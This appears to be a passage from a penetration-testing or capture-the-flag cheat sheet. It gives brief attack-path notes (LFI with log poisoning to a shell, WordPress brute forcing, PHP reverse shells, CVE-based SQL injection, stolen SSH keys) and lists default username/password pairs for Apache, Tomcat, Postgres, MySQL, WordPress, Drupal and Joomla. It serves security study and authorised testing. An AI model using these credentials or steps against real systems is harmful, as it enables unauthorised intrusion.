- unique subdirectory with LFI prereqs, new technique requires keyword to read, attempting to read system file appends with .php extension and include() function leads to PHP filter LFI to decode source code which reveals way to read system files and log poisoning to upload shell  
- wordpress server wpscan bruteforce for creds, edit obscure PHP extension for PHP reverse shell  
- webserver platform & version number reveal CVE SQLi public python script that returns hash with salt  
- dirsearch webserver reveal sitemap subdirectory with hidden ssh folder with id_rsa keys, username found in homepage source code  
- webserver platform & version leads to CVE reverse shell  

## **15. Default Credentials**

### **Apache**
~~~text
admin  password  
admin  
admin  Password1  
admin  password1  
admin  admin  
admin  tomcat  
both  tomcat  
manager  manager  
role1  role1  
role1  tomcat  
role  changethis  
root  Password1  
root  changethis  
root  password  
root  password1  
root  r00t  
root  root  
root  toor  
tomcat  tomcat  
tomcat  s3cret  
tomcat  password1  
tomcat  password  
tomcat  
tomcat  admin  
tomcat  changethis  
~~~

### **Tomcat**
~~~text
admin:admin  
tomcat:tomcat  
admin:<NOTHING>  
admin:s3cr3t  
tomcat:s3cr3t  
admin:tomcat  
~~~
### **Postgres**
~~~text
postgres  
postgres  postgres  
postgres  password    
postgres  admin    
admin     admin  
admin     password  
~~~

### **MySQL / MariaDB**
~~~text
root  
root  root  
root  password  
root  bitnami  
external  external
~~~

### **Wordpress**
~~~text
wp / wp  
admin / password  
root / vagrant
~~~

### **Drupal**
~~~text
admin / admin@123
~~~

### **Joomla**
~~~text
admin / admin
~~~

### **others**
~~~text
admin/admin
admin/password
root/root
administrator/
guest/guest
~~~